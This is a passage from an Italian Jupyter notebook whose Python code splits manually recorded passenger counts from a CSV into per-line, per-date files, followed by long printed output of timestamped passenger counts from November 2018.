"['2018-11-26 21:14:39', '16']\n",
"['2018-11-26 21:15:25', '14']\n",
"['2018-11-26 21:16:38', '13']\n",
"['2018-11-26 21:18:09', '13']\n",
"['2018-11-26 21:19:23', '9']\n",
"['2018-11-26 21:20:33', '5']\n",
"['2018-11-26 21:21:38', '1']\n",
"['2018-11-26 21:22:35', '1']\n",
"['2018-11-26 21:26:48', '0']\n",
"['2018-11-26 21:28:02', '0']\n",
"['2018-11-26 21:29:23', '0']\n",
"['2018-11-26 21:30:47', '0']\n",
"['2018-11-26 21:34:08', '1']\n",
"['2018-11-26 21:34:56', '1']\n",
"['2018-11-26 21:35:54', '2']\n",
"['2018-11-26 21:36:18', '2']\n",
"['2018-11-26 21:36:46', '2']\n",
"['2018-11-26 21:37:19', '2']\n",
"['2018-11-26 21:37:32', '2']\n",
"['2018-11-26 21:38:15', '2']\n",
"['2018-11-26 21:38:45', '2']\n",
"['2018-11-26 21:39:08', '2']\n",
"['2018-11-26 21:39:58', '2']\n",
"['2018-11-26 21:40:35', '2']\n",
"['2018-11-26 21:41:29', '2']\n",
"['2018-11-26 21:41:58', '2']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 21:42:07', '2']\n",
"['2018-11-26 21:43:51', '2']\n",
"['2018-11-26 21:44:32', '3']\n",
"['2018-11-26 21:47:37', '3']\n",
"['2018-11-26 21:49:10', '3']\n",
"['2018-11-26 21:50:01', '3']\n",
"['2018-11-26 21:52:21', '3']\n",
"['2018-11-26 21:53:01', '3']\n",
"['2018-11-26 21:54:28', '3']\n",
"['2018-11-26 21:55:40', '0']\n"
]
}
],
"source": [
"#divisore e perfezionatore file manuali\n",
"import csv\n",
"\n",
"import datetime\n",
"\n",
"with open ('Rilevazioni_manuali.csv', encoding = 'utf-8', newline = '') as f:\n",
" lettore = csv.reader (f, delimiter = ',')\n",
" \n",
" next(lettore)\n",
" for riga in lettore:\n",
" \n",
" Linea = int(riga[0])\n",
" \n",
" DaTi = int(riga [1])\n",
" if DaTi>1542848400 and DaTi<1542934800 :\n",
" Data = 22_11_2018\n",
" if DaTi>1542934800 and DaTi<1543021200 :\n",
" Data = 23_11_2018\n",
" if DaTi>1543021200 and DaTi<1543107600 :\n",
" Data = 24_11_2018\n",
" if DaTi>1543107600 and DaTi<1543194000 :\n",
" Data = 25_11_2018\n",
" if DaTi>1543194000 and DaTi<1543280400 :\n",
" Data = 26_11_2018\n",
" else:\n",
" data = 'boh'\n",
" \n",
" t2 = datetime.datetime.fromtimestamp(DaTi\n",
" )\n",
" #print (str(t2))\n",
" with open ('Man_linea_'+str(Linea)+str(Data)+'.csv', 'a') as nuovo:\n",
" passeggeri = []\n",
" passeggeri.append(str(t2))\n",
" passeggeri.append(riga[2])\n",
" print(passeggeri)# linea_11.append(riga[5])\n",
" writer=csv.writer(nuovo, delimiter = ',')\n",
" writer.writerow(passeggeri)\n",
" "
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 05:10:01.149774', 1]\n",
"['2018-11-22 05:11:44.552385', 2]\n",
"['2018-11-22 05:13:26.585631', 3]\n",
"['2018-11-22 05:14:21.455105', 4]\n",
"['2018-11-22 05:15:16.619168', 5]\n",
"['2018-11-22 05:16:21.755708', 4]\n",
"['2018-11-22 05:21:05.684763', 3]\n",
"['2018-11-22 05:22:01.117153', 4]\n",
"['2018-11-22 05:22:33.076706', 5]\n",
"['2018-11-22 05:22:41.833639', 6]\n",
"['2018-11-22 05:25:01.454146', 7]\n",
"['2018-11-22 05:26:01.063178', 8]\n",
"['2018-11-22 05:26:06.838000', 7]\n",
"['2018-11-22 05:26:08.517036', 8]\n",
"['2018-11-22 05:26:51.718326', 7]\n",
"['2018-11-22 05:27:24.008352', 8]\n",
"['2018-11-22 05:27:24.954317', 9]\n",
"['2018-11-22 05:28:11.975157', 10]\n",
"['2018-11-22 05:29:42.239785', 9]\n",
"['2018-11-22 05:30:23.434685', 10]\n",
"['2018-11-22 05:30:53.552263', 9]\n",
"['2018-11-22 05:31:52.257318', 8]\n",
"['2018-11-22 05:32:11.058018', 7]\n",
"['2018-11-22 05:32:18.995034', 6]\n",
"['2018-11-22 05:32:56.003503', 5]\n",
"['2018-11-22 05:34:37.571737', 4]\n",
"['2018-11-22 05:36:04.827326', 5]\n",
"['2018-11-22 05:40:39.986225', 4]\n",
"['2018-11-22 05:42:26.766570', 5]\n",
"['2018-11-22 05:42:34.790879', 6]\n",
"['2018-11-22 05:45:06.332360', 5]\n",
"['2018-11-22 05:46:46.875034', 4]\n",
"['2018-11-22 06:00:31.992794', 1]\n",
"['2018-11-22 06:01:14.461219', 2]\n",
"['2018-11-22 06:02:44.435528', 3]\n",
"['2018-11-22 06:06:10.018426', 4]\n",
"['2018-11-22 06:07:17.364779', 3]\n",
"['2018-11-22 06:08:13.329796', 4]\n",
"['2018-11-22 06:10:25.843660', 3]\n",
"['2018-11-22 06:12:26.884998', 2]\n",
"['2018-11-22 06:12:36.277192', 3]\n",
"['2018-11-22 06:16:44.379119', 1]\n",
"['2018-11-22 06:19:47.541398', 2]\n",
"['2018-11-22 06:20:02.593902', 3]\n",
"['2018-11-22 06:24:36.044871', 1]\n",
"['2018-11-22 06:29:44.585122', 2]\n",
"['2018-11-22 06:29:46.849977', 3]\n",
"['2018-11-22 06:31:03.058248', 4]\n",
"['2018-11-22 06:31:29.910093', 5]\n",
"['2018-11-22 06:31:35.915965', 6]\n",
"['2018-11-22 06:34:17.121425', 5]\n",
"['2018-11-22 06:34:20.219218', 6]\n",
"['2018-11-22 06:34:20.647713', 7]\n",
"['2018-11-22 06:35:01.185358', 8]\n",
"['2018-11-22 06:35:47.183387', 7]\n",
"['2018-11-22 06:37:00.985235', 6]\n",
"['2018-11-22 06:37:24.983287', 5]\n",
"['2018-11-22 06:37:29.498839', 6]\n",
"['2018-11-22 06:37:41.405000', 7]\n",
"['2018-11-22 06:38:18.575331', 8]\n",
"['2018-11-22 06:38:36.119408', 7]\n",
"['2018-11-22 06:40:20.298634', 6]\n",
"['2018-11-22 06:41:11.002663', 7]\n",
"['2018-11-22 06:42:07.733583', 8]\n",
"['2018-11-22 06:42:41.881419', 7]\n",
"['2018-11-22 06:43:26.006600', 8]\n",
"['2018-11-22 06:43:43.496039', 9]\n",
"['2018-11-22 06:45:11.098440', 10]\n",
"['2018-11-22 06:45:12.998045', 11]\n",
"['2018-11-22 06:45:40.295530', 10]\n",
"['2018-11-22 06:46:15.544969', 9]\n",
"['2018-11-22 06:48:33.525283', 6]\n",
"['2018-11-22 06:48:39.962345', 7]\n",
"['2018-11-22 06:48:46.278015', 8]\n",
"['2018-11-22 06:52:50.698458', 9]\n",
"['2018-11-22 06:55:01.245276', 10]\n",
"['2018-11-22 06:55:50.220454', 11]\n",
"['2018-11-22 06:56:10.014109', 12]\n",
"['2018-11-22 06:56:39.104395', 11]\n",
"['2018-11-22 06:59:02.253999', 12]\n",
"['2018-11-22 06:59:31.937611', 11]\n",
"['2018-11-22 07:00:17.091121', 9]\n",
"['2018-11-22 07:01:05.798093', 8]\n",
"['2018-11-22 07:01:31.500653', 9]\n",
"['2018-11-22 07:02:11.515823', 10]\n",
"['2018-11-22 07:02:42.715070', 11]\n",
"['2018-11-22 07:02:50.416261', 12]\n",
"['2018-11-22 07:03:23.959577', 13]\n",
"['2018-11-22 07:03:57.247620', 11]\n",
"['2018-11-22 07:05:41.977492', 12]\n",
"['2018-11-22 07:05:46.013884', 11]\n",
"['2018-11-22 07:06:43.320140', 9]\n",
"['2018-11-22 07:07:07.869868', 8]\n",
"['2018-11-22 07:07:52.481894', 9]\n",
"['2018-11-22 07:08:38.512696', 10]\n",
"['2018-11-22 07:08:44.046819', 11]\n",
"['2018-11-22 07:09:27.360802', 12]\n",
"['2018-11-22 07:09:34.512325', 11]\n",
"['2018-11-22 07:09:46.159622', 10]\n",
"['2018-11-22 07:09:58.746117', 9]\n",
"['2018-11-22 07:10:46.047447', 10]\n",
"['2018-11-22 07:11:40.827128', 11]\n",
"['2018-11-22 07:12:56.395274', 12]\n",
"['2018-11-22 07:13:02.241457', 13]\n",
"['2018-11-22 07:13:41.997053', 12]\n",
"['2018-11-22 07:14:02.025181', 11]\n",
"['2018-11-22 07:14:29.176852', 10]\n",
"['2018-11-22 07:15:43.774439', 9]\n",
"['2018-11-22 07:16:35.986634', 8]\n",
"['2018-11-22 07:19:56.428313', 9]\n",
"['2018-11-22 07:20:08.142666', 8]\n",
"['2018-11-22 07:21:03.809763', 7]\n",
"['2018-11-22 07:22:03.825746', 6]\n",
"['2018-11-22 07:22:27.556994', 7]\n",
"['2018-11-22 07:22:32.519593', 8]\n",
"['2018-11-22 07:22:40.687815', 9]\n",
"['2018-11-22 07:24:40.156487', 8]\n",
"['2018-11-22 07:25:38.870251', 7]\n",
"['2018-11-22 07:26:43.897580', 4]\n",
"['2018-11-22 07:27:45.847821', 5]\n",
"['2018-11-22 07:28:25.549597', 6]\n",
"['2018-11-22 07:29:56.600509', 5]\n",
"['2018-11-22 07:34:46.611293', 4]\n",
"['2018-11-22 07:35:11.623113', 5]\n",
"['2018-11-22 07:35:13.729722', 6]\n",
"['2018-11-22 07:36:09.323088', 5]\n",
"['2018-11-22 07:36:20.763481', 4]\n",
"['2018-11-22 07:36:50.009867', 3]\n",
"['2018-11-22 07:40:12.219658', 2]\n",
"['2018-11-22 07:40:15.529494', 3]\n",
"['2018-11-22 07:43:39.024825', 4]\n",
"['2018-11-22 07:46:47.178478', 3]\n",
"['2018-11-22 07:46:56.884717', 4]\n",
"['2018-11-22 07:47:11.238162', 5]\n",
"['2018-11-22 07:47:37.863651', 6]\n",
"['2018-11-22 07:48:33.574190', 7]\n",
"['2018-11-22 07:49:05.535069', 8]\n",
"['2018-11-22 07:51:00.136353', 9]\n",
"['2018-11-22 07:51:02.642170', 10]\n",
"['2018-11-22 07:51:54.695082', 11]\n",
"['2018-11-22 07:53:17.233885', 10]\n",
"['2018-11-22 07:53:43.779238', 11]\n",
"['2018-11-22 07:53:55.784801', 12]\n",
"['2018-11-22 07:55:12.557047', 13]\n",
"['2018-11-22 07:55:20.104493', 12]\n",
"['2018-11-22 07:55:25.470563', 13]\n",
"['2018-11-22 07:55:56.371469', 12]\n",
"['2018-11-22 07:56:23.577774', 13]\n",
"['2018-11-22 07:57:11.433808', 14]\n",
"['2018-11-22 07:57:56.474839', 13]\n",
"['2018-11-22 07:58:42.495444', 12]\n",
"['2018-11-22 07:58:57.501227', 11]\n",
"['2018-11-22 07:59:04.933114', 12]\n",
"['2018-11-22 07:59:25.956159', 11]\n",
"['2018-11-22 07:59:40.946344', 10]\n",
"['2018-11-22 08:01:14.233937', 11]\n",
"['2018-11-22 08:01:26.448330', 12]\n",
"['2018-11-22 08:02:04.923254', 13]\n",
"['2018-11-22 08:02:22.067918', 14]\n",
"['2018-11-22 08:02:40.633252', 15]\n",
"['2018-11-22 08:03:40.973875', 14]\n",
"['2018-11-22 08:03:42.806730', 15]\n",
"['2018-11-22 08:04:18.908720', 16]\n",
"['2018-11-22 08:05:03.254138', 15]\n",
"['2018-11-22 08:05:19.662309', 16]\n",
"['2018-11-22 08:05:45.118527', 17]\n",
"['2018-11-22 08:06:11.656689', 14]\n",
"['2018-11-22 08:06:43.910160', 11]\n",
"['2018-11-22 08:06:58.658388', 10]\n",
"['2018-11-22 08:07:11.195225', 11]\n",
"['2018-11-22 08:08:46.058415', 10]\n",
"['2018-11-22 08:09:26.692393', 9]\n",
"['2018-11-22 08:09:38.369698', 8]\n",
"['2018-11-22 08:09:46.921821', 6]\n",
"['2018-11-22 08:11:17.648116', 5]\n",
"['2018-11-22 08:11:33.598006', 6]\n",
"['2018-11-22 08:12:15.970064', 5]\n",
"['2018-11-22 08:13:07.997015', 6]\n",
"['2018-11-22 08:13:15.356807', 7]\n",
"['2018-11-22 08:14:23.934554', 6]\n",
"['2018-11-22 08:15:20.366119', 5]\n",
"['2018-11-22 08:15:34.172281', 4]\n",
"['2018-11-22 08:16:17.247227', 5]\n",
"['2018-11-22 08:18:37.252270', 6]\n",
"['2018-11-22 08:22:53.708680', 5]\n",
"['2018-11-22 08:23:04.005860', 4]\n",
"['2018-11-22 08:23:52.533238', 3]\n",
"['2018-11-22 08:25:08.696874', 4]\n",
"['2018-11-22 08:28:14.153527', 5]\n",
"['2018-11-22 08:30:02.510369', 3]\n",
"['2018-11-22 08:30:04.686794', 4]\n",
"['2018-11-22 08:30:06.686522', 3]\n",
"['2018-11-22 08:34:52.532767', 1]\n",
"['2018-11-22 08:35:01.300413', 2]\n",
"['2018-11-22 08:35:09.711807', 3]\n",
"['2018-11-22 08:39:10.839680', 4]\n",
"['2018-11-22 08:39:57.629272', 3]\n",
"['2018-11-22 08:40:05.935061', 2]\n",
"['2018-11-22 08:40:07.298773', 1]\n",
"['2018-11-22 08:44:22.231721', 2]\n",
"['2018-11-22 08:44:24.289735', 3]\n",
"['2018-11-22 08:46:22.287979', 4]\n",
"['2018-11-22 08:50:10.039621', 3]\n",
"['2018-11-22 08:51:47.146620', 4]\n",
"['2018-11-22 08:52:38.448735', 3]\n",
"['2018-11-22 08:53:49.763483', 4]\n",
"['2018-11-22 08:55:03.730670', 5]\n",
"['2018-11-22 08:55:17.095817', 6]\n",
"['2018-11-22 08:55:42.870729', 7]\n",
"['2018-11-22 08:56:35.066757', 6]\n",
"['2018-11-22 08:57:19.189101', 7]\n",
"['2018-11-22 09:00:08.632490', 6]\n",
"['2018-11-22 09:00:13.286970', 7]\n",
"['2018-11-22 09:00:44.600227', 8]\n",
"['2018-11-22 09:01:23.592890', 6]\n",
"['2018-11-22 09:01:37.600377', 5]\n",
"['2018-11-22 09:02:06.580712', 6]\n",
"['2018-11-22 09:03:59.561740', 7]\n",
"['2018-11-22 09:04:23.561055', 8]\n",
"['2018-11-22 09:05:07.434409', 9]\n",
"['2018-11-22 09:05:31.375960', 10]\n",
"['2018-11-22 09:05:45.328259', 9]\n",
"['2018-11-22 09:06:07.441895', 7]\n",
"['2018-11-22 09:08:04.742468', 6]\n",
"['2018-11-22 09:08:09.964108', 7]\n",
"['2018-11-22 09:08:11.197315', 8]\n",
"['2018-11-22 09:08:33.579216', 9]\n",
"['2018-11-22 09:08:54.945085', 8]\n",
"['2018-11-22 09:10:22.895250', 9]\n",
"['2018-11-22 09:10:28.790340', 10]\n",
"['2018-11-22 09:10:31.757536', 9]\n",
"['2018-11-22 09:12:10.760158', 10]\n",
"['2018-11-22 09:13:10.687793', 9]\n",
"['2018-11-22 09:13:41.681715', 8]\n",
"['2018-11-22 09:15:31.465191', 9]\n",
"['2018-11-22 09:16:00.072819', 8]\n",
"['2018-11-22 09:16:22.987630', 9]\n",
"['2018-11-22 09:16:54.096916', 8]\n",
"['2018-11-22 09:17:45.894760', 7]\n",
"['2018-11-22 09:18:17.933812', 6]\n",
"['2018-11-22 09:19:13.002601', 5]\n",
"['2018-11-22 09:20:19.455032', 4]\n",
"['2018-11-22 09:22:20.822047', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 09:27:21.676399', 4]\n",
"['2018-11-22 09:42:07.341817', 1]\n",
"['2018-11-22 09:47:23.053508', 2]\n",
"['2018-11-22 09:49:40.105453', 3]\n",
"['2018-11-22 09:51:18.474855', 4]\n",
"['2018-11-22 09:55:44.389614', 1]\n",
"['2018-11-22 09:56:46.448728', 2]\n",
"['2018-11-22 09:56:49.941784', 3]\n",
"['2018-11-22 09:56:58.846986', 4]\n",
"['2018-11-22 09:58:00.239164', 5]\n",
"['2018-11-22 09:59:19.135295', 6]\n",
"['2018-11-22 10:01:36.096688', 4]\n",
"['2018-11-22 10:01:41.180709', 5]\n",
"['2018-11-22 10:02:55.202341', 4]\n",
"['2018-11-22 10:04:06.717500', 5]\n",
"['2018-11-22 10:04:41.850574', 6]\n",
"['2018-11-22 10:05:35.671132', 7]\n",
"['2018-11-22 10:06:38.782622', 5]\n",
"['2018-11-22 10:07:00.051297', 6]\n",
"['2018-11-22 10:09:08.893575', 4]\n",
"['2018-11-22 10:09:25.781727', 5]\n",
"['2018-11-22 10:09:50.897327', 6]\n",
"['2018-11-22 10:10:31.163369', 7]\n",
"['2018-11-22 10:10:32.060779', 8]\n",
"['2018-11-22 10:12:49.064475', 7]\n",
"['2018-11-22 10:14:49.194444', 6]\n",
"['2018-11-22 10:15:04.366695', 5]\n",
"['2018-11-22 10:15:45.084242', 4]\n",
"['2018-11-22 10:16:09.083474', 3]\n",
"['2018-11-22 10:16:15.989536', 4]\n",
"['2018-11-22 10:16:51.938015', 5]\n",
"['2018-11-22 10:19:22.764188', 4]\n",
"['2018-11-22 10:21:02.124386', 3]\n",
"['2018-11-22 10:23:34.071437', 2]\n",
"['2018-11-22 10:29:34.520379', 3]\n",
"['2018-11-22 10:30:24.090653', 4]\n",
"['2018-11-22 10:30:24.879693', 5]\n",
"['2018-11-22 10:32:43.805264', 6]\n",
"['2018-11-22 10:34:29.966760', 3]\n",
"['2018-11-22 10:37:48.608019', 2]\n",
"['2018-11-22 10:38:02.160591', 1]\n",
"['2018-11-22 10:38:06.147720', 2]\n",
"['2018-11-22 10:38:50.233397', 3]\n",
"['2018-11-22 10:38:55.120716', 4]\n",
"['2018-11-22 10:39:02.448362', 5]\n",
"['2018-11-22 10:43:48.662731', 2]\n",
"['2018-11-22 10:44:08.960310', 3]\n",
"['2018-11-22 10:47:42.781130', 4]\n",
"['2018-11-22 10:54:19.252593', 3]\n",
"['2018-11-22 10:54:40.363298', 4]\n",
"['2018-11-22 10:57:45.617015', 5]\n",
"['2018-11-22 11:01:27.181592', 6]\n",
"['2018-11-22 11:02:23.277004', 4]\n",
"['2018-11-22 11:03:06.856215', 5]\n",
"['2018-11-22 11:04:50.710731', 6]\n",
"['2018-11-22 11:04:53.579321', 7]\n",
"['2018-11-22 11:04:56.801610', 6]\n",
"['2018-11-22 11:05:40.964096', 7]\n",
"['2018-11-22 11:05:58.905965', 8]\n",
"['2018-11-22 11:06:05.971352', 9]\n",
"['2018-11-22 11:06:37.451351', 8]\n",
"['2018-11-22 11:07:08.517138', 7]\n",
"['2018-11-22 11:07:59.640473', 8]\n",
"['2018-11-22 11:08:30.715716', 9]\n",
"['2018-11-22 11:08:41.894004', 10]\n",
"['2018-11-22 11:08:48.263730', 11]\n",
"['2018-11-22 11:09:04.573968', 12]\n",
"['2018-11-22 11:09:24.550383', 11]\n",
"['2018-11-22 11:09:48.470166', 10]\n",
"['2018-11-22 11:09:56.432088', 11]\n",
"['2018-11-22 11:10:03.362631', 10]\n",
"['2018-11-22 11:11:02.044217', 11]\n",
"['2018-11-22 11:12:25.005241', 10]\n",
"['2018-11-22 11:12:35.775049', 11]\n",
"['2018-11-22 11:12:54.587888', 9]\n",
"['2018-11-22 11:13:01.536450', 10]\n",
"['2018-11-22 11:14:11.757738', 9]\n",
"['2018-11-22 11:15:04.989977', 8]\n",
"['2018-11-22 11:16:04.953901', 9]\n",
"['2018-11-22 11:16:54.103765', 10]\n",
"['2018-11-22 11:17:16.404007', 9]\n",
"['2018-11-22 11:17:53.956117', 8]\n",
"['2018-11-22 11:19:41.657177', 7]\n",
"['2018-11-22 11:20:29.614631', 6]\n",
"['2018-11-22 11:20:53.993003', 7]\n",
"['2018-11-22 11:21:30.614046', 6]\n",
"['2018-11-22 11:22:01.635267', 5]\n",
"['2018-11-22 11:24:04.656597', 4]\n",
"['2018-11-22 11:24:17.214986', 3]\n",
"['2018-11-22 11:24:58.677385', 2]\n",
"['2018-11-22 11:29:47.636319', 1]\n",
"['2018-11-22 11:45:36.548706', 2]\n",
"['2018-11-22 11:47:14.225998', 3]\n",
"['2018-11-22 11:49:06.331554', 4]\n",
"['2018-11-22 11:49:18.484064', 5]\n",
"['2018-11-22 11:49:39.292678', 6]\n",
"['2018-11-22 11:49:49.284711', 7]\n",
"['2018-11-22 11:52:10.622952', 6]\n",
"['2018-11-22 11:53:59.941412', 3]\n",
"['2018-11-22 11:54:13.709475', 4]\n",
"['2018-11-22 11:55:32.604471', 3]\n",
"['2018-11-22 11:57:22.020750', 4]\n",
"['2018-11-22 11:57:26.741427', 5]\n",
"['2018-11-22 12:00:21.958711', 6]\n",
"['2018-11-22 12:00:29.402072', 7]\n",
"['2018-11-22 12:00:54.199062', 8]\n",
"['2018-11-22 12:01:30.721918', 7]\n",
"['2018-11-22 12:01:37.750576', 8]\n",
"['2018-11-22 12:01:54.504382', 9]\n",
"['2018-11-22 12:02:23.705199', 10]\n",
"['2018-11-22 12:02:29.618755', 11]\n",
"['2018-11-22 12:04:19.340852', 12]\n",
"['2018-11-22 12:04:48.814452', 11]\n",
"['2018-11-22 12:04:57.454467', 10]\n",
"['2018-11-22 12:05:09.120611', 9]\n",
"['2018-11-22 12:05:17.876684', 10]\n",
"['2018-11-22 12:06:08.221882', 9]\n",
"['2018-11-22 12:06:34.391970', 5]\n",
"['2018-11-22 12:07:47.628381', 6]\n",
"['2018-11-22 12:08:03.035325', 7]\n",
"['2018-11-22 12:09:04.065899', 6]\n",
"['2018-11-22 12:09:09.783690', 5]\n",
"['2018-11-22 12:09:12.089747', 6]\n",
"['2018-11-22 12:09:13.762455', 7]\n",
"['2018-11-22 12:09:17.906602', 6]\n",
"['2018-11-22 12:09:25.093844', 7]\n",
"['2018-11-22 12:11:16.024801', 8]\n",
"['2018-11-22 12:11:42.036494', 9]\n",
"['2018-11-22 12:12:00.507708', 8]\n",
"['2018-11-22 12:13:04.875822', 7]\n",
"['2018-11-22 12:14:08.946345', 6]\n",
"['2018-11-22 12:15:48.502250', 5]\n",
"['2018-11-22 12:15:55.830376', 6]\n",
"['2018-11-22 12:17:42.580436', 4]\n",
"['2018-11-22 12:21:17.322875', 3]\n",
"['2018-11-22 12:23:21.817294', 2]\n",
"['2018-11-22 12:23:30.178417', 3]\n",
"['2018-11-22 12:28:21.441296', 2]\n",
"['2018-11-22 12:28:53.167391', 3]\n",
"['2018-11-22 12:31:34.982547', 2]\n",
"['2018-11-22 12:32:03.427247', 3]\n",
"['2018-11-22 12:32:04.684273', 4]\n",
"['2018-11-22 12:32:05.526583', 5]\n",
"['2018-11-22 12:34:49.242881', 4]\n",
"['2018-11-22 12:37:52.660144', 2]\n",
"['2018-11-22 12:37:55.453496', 3]\n",
"['2018-11-22 12:37:56.553849', 4]\n",
"['2018-11-22 12:38:32.885875', 5]\n",
"['2018-11-22 12:42:59.408822', 1]\n",
"['2018-11-22 12:49:33.662847', 2]\n",
"['2018-11-22 12:50:18.631586', 3]\n",
"['2018-11-22 12:52:20.450725', 4]\n",
"['2018-11-22 12:52:36.961611', 5]\n",
"['2018-11-22 12:53:09.434370', 6]\n",
"['2018-11-22 12:53:13.246185', 7]\n",
"['2018-11-22 12:53:28.932382', 8]\n",
"['2018-11-22 12:54:24.810111', 9]\n",
"['2018-11-22 12:54:54.922067', 8]\n",
"['2018-11-22 12:55:11.728747', 9]\n",
"['2018-11-22 12:55:43.075112', 10]\n",
"['2018-11-22 12:55:48.330839', 11]\n",
"['2018-11-22 12:56:28.124436', 12]\n",
"['2018-11-22 12:56:45.454007', 13]\n",
"['2018-11-22 12:57:30.778168', 12]\n",
"['2018-11-22 12:57:33.715659', 13]\n",
"['2018-11-22 12:58:19.631760', 11]\n",
"['2018-11-22 12:59:38.353901', 10]\n",
"['2018-11-22 13:00:06.165303', 11]\n",
"['2018-11-22 13:00:16.532782', 12]\n",
"['2018-11-22 13:00:40.415334', 9]\n",
"['2018-11-22 13:01:22.282460', 7]\n",
"['2018-11-22 13:01:39.375872', 5]\n",
"['2018-11-22 13:02:30.125385', 6]\n",
"['2018-11-22 13:02:30.639555', 7]\n",
"['2018-11-22 13:02:57.642411', 6]\n",
"['2018-11-22 13:03:55.617290', 7]\n",
"['2018-11-22 13:04:21.323415', 6]\n",
"['2018-11-22 13:04:26.983643', 7]\n",
"['2018-11-22 13:04:48.417031', 8]\n",
"['2018-11-22 13:05:41.691413', 9]\n",
"['2018-11-22 13:06:35.411924', 8]\n",
"['2018-11-22 13:07:36.810025', 7]\n",
"['2018-11-22 13:08:39.553024', 5]\n",
"['2018-11-22 13:11:14.993247', 2]\n",
"['2018-11-22 13:12:54.657817', 1]\n",
"['2018-11-22 13:14:33.838002', 2]\n",
"['2018-11-22 13:14:45.873352', 3]\n",
"['2018-11-22 13:17:14.160006', 4]\n",
"['2018-11-22 13:17:40.740439', 5]\n",
"['2018-11-22 13:28:41.518466', 1]\n",
"['2018-11-22 13:39:30.425895', 2]\n",
"['2018-11-22 13:40:47.150283', 3]\n",
"['2018-11-22 13:43:01.693944', 4]\n",
"['2018-11-22 13:43:02.807838', 5]\n",
"['2018-11-22 13:45:06.797245', 6]\n",
"['2018-11-22 13:47:06.569356', 5]\n",
"['2018-11-22 13:47:24.148449', 6]\n",
"['2018-11-22 13:48:38.781336', 5]\n",
"['2018-11-22 13:49:09.803606', 4]\n",
"['2018-11-22 13:51:40.607138', 5]\n",
"['2018-11-22 13:51:49.867282', 4]\n",
"['2018-11-22 13:54:14.675855', 5]\n",
"['2018-11-22 13:56:24.482585', 6]\n",
"['2018-11-22 13:56:25.270884', 7]\n",
"['2018-11-22 13:56:33.125180', 8]\n",
"['2018-11-22 13:56:48.855751', 9]\n",
"['2018-11-22 13:56:55.714242', 10]\n",
"['2018-11-22 13:58:35.472557', 9]\n",
"['2018-11-22 13:59:50.125607', 10]\n",
"['2018-11-22 14:00:15.654618', 11]\n",
"['2018-11-22 14:00:37.312658', 10]\n",
"['2018-11-22 14:00:51.742606', 11]\n",
"['2018-11-22 14:00:57.225779', 9]\n",
"['2018-11-22 14:01:08.685841', 8]\n",
"['2018-11-22 14:02:03.641519', 7]\n",
"['2018-11-22 14:03:16.634287', 8]\n",
"['2018-11-22 14:03:56.197383', 7]\n",
"['2018-11-22 14:04:28.342580', 6]\n",
"['2018-11-22 14:05:36.742733', 7]\n",
"['2018-11-22 14:06:23.382243', 8]\n",
"['2018-11-22 14:06:48.706768', 9]\n",
"['2018-11-22 14:07:35.690414', 8]\n",
"['2018-11-22 14:08:35.690787', 7]\n",
"['2018-11-22 14:08:54.001910', 6]\n",
"['2018-11-22 14:10:08.736174', 7]\n",
"['2018-11-22 14:10:31.035410', 6]\n",
"['2018-11-22 14:10:32.574331', 7]\n",
"['2018-11-22 14:11:00.862600', 5]\n",
"['2018-11-22 14:13:14.147642', 6]\n",
"['2018-11-22 14:13:22.521414', 7]\n",
"['2018-11-22 14:14:55.639181', 8]\n",
"['2018-11-22 14:17:16.951996', 9]\n",
"['2018-11-22 14:18:01.592549', 8]\n",
"['2018-11-22 14:19:14.949164', 9]\n",
"['2018-11-22 14:19:32.060764', 8]\n",
"['2018-11-22 14:20:47.720020', 5]\n",
"['2018-11-22 14:20:51.110942', 6]\n",
"['2018-11-22 14:23:52.133283', 5]\n",
"['2018-11-22 14:25:36.201885', 3]\n",
"['2018-11-22 14:27:20.341397', 2]\n",
"['2018-11-22 14:40:30.179963', 1]\n",
"['2018-11-22 14:40:31.851510', 2]\n",
"['2018-11-22 14:40:32.897222', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 14:42:40.786179', 4]\n",
"['2018-11-22 14:43:48.421694', 5]\n",
"['2018-11-22 14:43:54.701535', 6]\n",
"['2018-11-22 14:44:36.873368', 5]\n",
"['2018-11-22 14:44:42.765645', 3]\n",
"['2018-11-22 14:45:31.319397', 4]\n",
"['2018-11-22 14:49:28.390802', 3]\n",
"['2018-11-22 14:49:54.720142', 4]\n",
"['2018-11-22 14:50:48.407054', 3]\n",
"['2018-11-22 14:51:20.599469', 4]\n",
"['2018-11-22 14:51:26.235453', 5]\n",
"['2018-11-22 14:51:34.058680', 6]\n",
"['2018-11-22 14:52:44.489990', 7]\n",
"['2018-11-22 14:53:16.620652', 8]\n",
"['2018-11-22 14:54:00.890871', 7]\n",
"['2018-11-22 14:54:15.521265', 8]\n",
"['2018-11-22 14:54:29.892133', 9]\n",
"['2018-11-22 14:54:30.207510', 10]\n",
"['2018-11-22 14:54:32.701396', 11]\n",
"['2018-11-22 14:55:24.841128', 12]\n",
"['2018-11-22 14:56:21.449150', 13]\n",
"['2018-11-22 14:57:27.538684', 12]\n",
"['2018-11-22 14:58:02.026581', 11]\n",
"['2018-11-22 14:58:21.117452', 12]\n",
"['2018-11-22 14:58:37.904317', 10]\n",
"['2018-11-22 14:59:22.683335', 11]\n",
"['2018-11-22 14:59:36.757972', 10]\n",
"['2018-11-22 14:59:40.651045', 11]\n",
"['2018-11-22 15:00:21.231918', 10]\n",
"['2018-11-22 15:01:21.666091', 9]\n",
"['2018-11-22 15:01:27.691585', 8]\n",
"['2018-11-22 15:01:30.731399', 9]\n",
"['2018-11-22 15:03:20.173373', 8]\n",
"['2018-11-22 15:03:28.387284', 9]\n",
"['2018-11-22 15:03:29.054858', 10]\n",
"['2018-11-22 15:03:51.358937', 11]\n",
"['2018-11-22 15:03:55.329986', 12]\n",
"['2018-11-22 15:04:37.833155', 13]\n",
"['2018-11-22 15:05:15.030869', 14]\n",
"['2018-11-22 15:05:19.217748', 15]\n",
"['2018-11-22 15:05:22.768497', 14]\n",
"['2018-11-22 15:05:40.386313', 15]\n",
"['2018-11-22 15:06:59.578585', 14]\n",
"['2018-11-22 15:06:59.786971', 15]\n",
"['2018-11-22 15:07:29.359931', 16]\n",
"['2018-11-22 15:07:30.206732', 15]\n",
"['2018-11-22 15:07:55.264093', 13]\n",
"['2018-11-22 15:07:59.379783', 14]\n",
"['2018-11-22 15:08:19.468301', 13]\n",
